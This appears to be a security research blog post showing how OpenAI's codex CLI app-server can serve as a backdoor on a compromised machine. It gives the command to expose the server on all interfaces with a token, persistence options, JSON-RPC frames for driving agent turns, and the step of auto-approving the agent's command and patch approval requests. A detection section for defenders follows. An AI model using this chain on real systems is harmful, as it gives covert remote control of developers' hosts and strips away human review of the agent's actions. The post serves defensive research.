Codex on the Wire: One Flag Away From a Network Service

2026-04-28 · David Kaplan

A colleague of mine, Tyler Holmwood, recently took apart Anthropic's Remote Control feature in Claude Code. He showed how a single --sdk-server flag could turn the binary into a C2 client. After reading that, I went looking for the equivalent surface in OpenAI's codex CLI. But fortunately I didn't have to reverse engineer anything; the codex code is open source.

Mapping the IPC surface

codex --help is unusually verbose, and worth reading carefully. It documents four IPC surfaces right in the top-level command list:

Surface	Transport
`codex app-server`	WebSocket or stdio, plus HTTP `/healthz` and `/readyz`
`codex mcp-server`	stdio
`codex exec-server`	WebSocket
`codex exec`	stdout, one-shot

Three of them are bidirectional enough to be interesting. The last one is simply command line invocation - useful for scripting, but not really for remote control.

The front door

app-server is OpenAI's native Codex IPC surface. It speaks JSON-RPC 2.0 over stdio or WebSocket and exposes HTTP health probes alongside it. The --remote flag is the documented TUI client path: it connects the terminal UI to a remote app-server WebSocket endpoint.

The binary will generate the protocol contract for you:

codex app-server generate-json-schema --out ./schema --experimental
codex app-server generate-ts          --out ./ts     --experimental

That gives you a JSON Schema bundle and a TypeScript barrel covering the methods, notifications, params, and response shapes. In 0.124.0, I counted 88 client-to-server requests, 9 server-to-client requests, 58 server-to-client notifications, and 1 client-to-server notification.

That is a lot of surface. For comparison, an MCP host driving Codex through codex mcp-server gets two tools: codex and codex-reply. The full app-server protocol includes thread management, turn control, filesystem read/write, fuzzy file search, git-diff inspection, MCP-host orchestration, plugin install, skill config, account/auth flow, device-key signing, voice/realtime, command execution with PTY resize, and a streaming event bus with tens of notification types.

For the chain below, you need almost none of that. A small client can touch enough of the protocol to turn a local agent into something remote-controlled.

Transports

--listen <URL>
    stdio://       (default)
    ws://IP:PORT   (WebSocket, loopback-only by default)
    off            (disable the listener)

Stdio is the default transport but the WebSocket form is the one that interests us because it can be network reachable if you bind it to a non-loopback IP.

$ codex app-server --listen ws://127.0.0.1:8765
codex app-server (WebSockets)
  listening on: ws://127.0.0.1:8765
  readyz: http://127.0.0.1:8765/readyz
  healthz: http://127.0.0.1:8765/healthz
  note: binds localhost only (use SSH port-forwarding for remote access)

That "binds localhost only" line is true for that command line because I gave it 127.0.0.1. It is not a hard property of app-server. Bind it to 0.0.0.0 and Codex happily listens on every interface.

Authentication

There are two modes:

capability-token: a pre-shared opaque bearer. You can give Codex the raw token in a file with --ws-token-file, or give it only the SHA-256 digest with --ws-token-sha256 so the on-disk artifact does not contain the secret. Clients send Authorization: Bearer <token> during the WebSocket upgrade.
signed-bearer-token: a JWT-style bearer. Codex validates an HMAC signature from --ws-shared-secret-file, checks iss, aud, and exp, and allows a configurable clock-skew window.

On a loopback listener such as 127.0.0.1, neither mode is enforced. The first message my test client sent was an unauthenticated initialize, and Codex answered it happily. On localhost, that is a reasonable integration choice. In 0.125.0, I found the same is true on 0.0.0.0: auth flags accepted on the command line, but an unauthenticated client still gets in. Once the listener moves to 0.0.0.0, that becomes exposure.

Protocol

Codex's app-server protocol is JSON-RPC-shaped, but not strict JSON-RPC 2.0 on the wire. In the generated schema and in raw frames I sampled, inbound server responses and notifications omit the "jsonrpc": "2.0" member. A client should classify messages structurally instead: id plus result or error is a response, id plus method is a server request, and method without id is a notification.

An initialize exchange looks like this:

// > client
{"jsonrpc":"2.0","id":1,"method":"initialize","params":{
   "clientInfo":{"name":"probe","title":"probe","version":"0.0.1"},
   "capabilities":{}
 }}

// < server
{"id":1,"result":{
   "userAgent":"probe/0.124.0 (Arch Linux Rolling Release; x86_64) ghostty/1.3.1-arch2 (probe; 0.0.1)",
   "codexHome":"/home/depmod/.codex",
   "platformFamily":"unix",
   "platformOs":"linux"
 }}

The lifecycle looks like this:

open transport
    -> initialize
    -> initialized                (notification, optional)
    -> thread/start | thread/list + thread/resume
    -> turn/start
       (consume server notifications until turn/completed)
       (respond to server->client requests like execCommandApproval)
    -> repeat turn/start, or turn/interrupt / turn/steer

You do not need to implement the whole protocol to get a useful client, but you do need to answer approvals. If your client ignores execCommandApproval or applyPatchApproval, the agent's turn hangs. You can get one turn deep and then stall forever on a command approval if you do not handle those server-to-client requests.

The backdoor

At Origin, our research focuses heavily on emergent endpoint tradecraft. Finding Codex on a compromised endpoint is basically a free backdoor kit that is remotely drivable almost out of the box.

Here the tradecraft chain is straightforward:

Start a codex app-server on a non-loopback interface with a fixed bearer token.
Persist it through cron, a Scheduled Task, launchd, et al.
Connect with the token and drive turns remotely.

This is less operational than Claude Code's --sdk-url path because Codex is listening for an inbound connection rather than beaconing out to attacker-controlled infrastructure. Firewalls, NAT, and EDR rules that watch inbound listeners all come into play here. You can work around that with a tunnel, port forward, or relay, but then the tunnel becomes a separate artifact to deploy and detect.

Server side: command line

Hash the token and pass the digest with --ws-token-sha256, so the raw secret does not need to live on disk:

$ echo -n 'super-secret-token' | sha256sum
599a7f359d1e11124054f8afeae201f2d265b8988d91cb5b7d4dc4c9e2225c30  -

The server command is just:

codex app-server \
  --listen ws://0.0.0.0:8765 \
  --ws-auth capability-token \
  --ws-token-sha256 599a7f359d1e11124054f8afeae201f2d265b8988d91cb5b7d4dc4c9e2225c30

That is enough to start the server. There is no injected process or custom binary to spot; the process tree just shows codex.

From there, persistence can be cron, systemd --user, launchd, Windows Scheduled Tasks, or whatever flavour fits the host.

Client side: driving a turn

The easiest client choice is Codex itself. Point a TUI at the listener with codex --remote and you get the normal interactive experience over the WebSocket:

TOKEN="super-secret-token" codex --remote ws://localhost:8765 --remote-auth-token-env TOKEN

If you want custom tooling to drive the session, the client is just a JSON-RPC peer. It has to do four things:

Open a WebSocket with Authorization: Bearer <token>.
Send initialize.
Create or resume a thread.
Send turn/start, then read notifications until turn/completed.

The minimum useful wire flow looks like this:

// > initialize
{"jsonrpc":"2.0","id":1,"method":"initialize","params":{
  "clientInfo":{"name":"ws-harness","title":"ws-harness","version":"0.1.0"},
  "capabilities":{}
}}

// < initialize response
{"id":1,"result":{
  "userAgent":"ws-harness/0.124.0 (...)",
  "codexHome":"/home/victim/.codex",
  "platformFamily":"unix",
  "platformOs":"linux"
}}

// > create a thread in the developer's repo
{"jsonrpc":"2.0","id":2,"method":"thread/start","params":{
  "cwd":"/home/victim/code/target-repo",
  "approvalPolicy":"on-request",
  "sandbox":"workspace-write",
  "experimentalRawEvents":false,
  "persistExtendedHistory":true
}}

// > start a turn
{"jsonrpc":"2.0","id":3,"method":"turn/start","params":{
  "threadId":"<thread id from thread/start>",
  "input":[{"type":"text","text":"Summarise the repository and list recent uncommitted changes.","text_elements":[]}]
}}

From there, the server emits the same family of events the TUI renders: turn/started, item/started, item/reasoning/textDelta, item/agentMessage/delta, item/commandExecution/outputDelta, turn/diff/updated, and finally turn/completed.

The approvals flow works like this. Codex does not silently run arbitrary commands. It asks the connected client to review them. On the wire, that is a server-to-client request:

// < server asks the client
{"jsonrpc":"2.0","id":41,"method":"execCommandApproval","params":{
  "conversationId":"<thread id>",
  "callId":"call_...",
  "approvalId":"...",
  "command":["bash","-lc","git status --short"],
  "cwd":"/home/victim/code/target-repo",
  "reason":null,
  "parsedCmd":[]
}}

// > client answers
{"jsonrpc":"2.0","id":41,"result":{"decision":"approved"}}

applyPatchApproval works the same way, except the params contain proposed file changes instead of a shell command. A real UI would put this in front of a human but of course a malicious client can just rubber-stamp it.

For a concrete client, see the example script at codex-remote.py. It is enough to connect, initialize, start a thread, drive a turn, and answer approvals.

Praxis support

Praxis now treats Codex app-server nodes as remote peers. The latest release bridges Praxis's internal ACP framing to the Codex protocol above.

To add one, point Praxis at a WebSocket URL with a bearer token. The node then behaves like any other agent: prompts go through as turns, and Codex's command-approval requests show up as regular Praxis permission prompts (auto-approved in yolo mode, otherwise forwarded to the client UI). session/list, session/cancel, and health probes all work, so existing orchestration and TUI/Web flows handle Codex without changes.

For red teams this means a Codex app-server listener deployed on a compromised endpoint can be registered as a remote node and driven through the same semantic-operation and orchestration paths that Praxis already uses for local agents.

What defenders can look for

These detection signals are standard EDR fare applied to codex:

Signal	Why it is useful
`codex app-server` with `--listen ws://0.0.0.0:*` or another non-loopback address	A local developer tool is now network reachable.
Inbound connections to a Codex process	The normal TUI/stdout flows do not require arbitrary inbound peers.
User cron entries, `systemd --user` units, launch agents, Windows Scheduled Tasks, etc. that start `codex app-server`	Persistence is the suspicious part, not the existence of Codex.

Defenders can also enumerate /readyz and /healthz across internal networks to find exposed Codex app-server instances. That can surface both misconfigured developer machines and malicious listeners left behind after initial access. The probe endpoints seem to be borrowed from Kubernetes convention, so defenders will need to differentiate between legitimate cluster infrastructure and a Codex app-server that happens to answer on the same paths.

These are not detections to bet the company on. The more durable control is policy. Firstly decide whether endpoints may expose agent CLIs as network services at all and then enforce that with host firewalls, EDR process rules, and the usual set of tools available for this purpose

In terms of detection, at this point, traditional EDR starts to feel thin. It can hunt the artifacts one by one. Signals are useful, but every new agent feature creates another pile of specific detections to write and maintain.

This is where Origin-style AI observability earns its keep. The useful signal is bigger than "codex opened a socket." It is what happened inside the agent session, i.e. who prompted it, what tools it asked to run, what files it read or changed as a result of specific adversarial prompts, and whether the session looked like normal development work or something else entirely. That gives defenders a more general visibility plane than chasing every persistence trick and transport binding separately, treating every new agent feature as its own detection engineering project.

Closing

This was a quick look at one documented protocol in one agent CLI that can turn a local agent into something a remote client can drive. In future posts I'll get into some of the undocumented surfaces that are lurking around.

Agent features do not have to have vulnerabilities to become attacker tradecraft. They only have to be useful, installed in the right place, and exposed in a way someone can reach.

The defensive answer cannot stop at another checklist of flags and process names + trying to discern suspicious behaviour from external signals. Those checks matter of course, but the real action is moving into the semantic world; the prompts, approvals, tool calls, actions taken, and the chain of decisions that connects them. If agents are going to sit between users and their machines, defenders need visibility there too.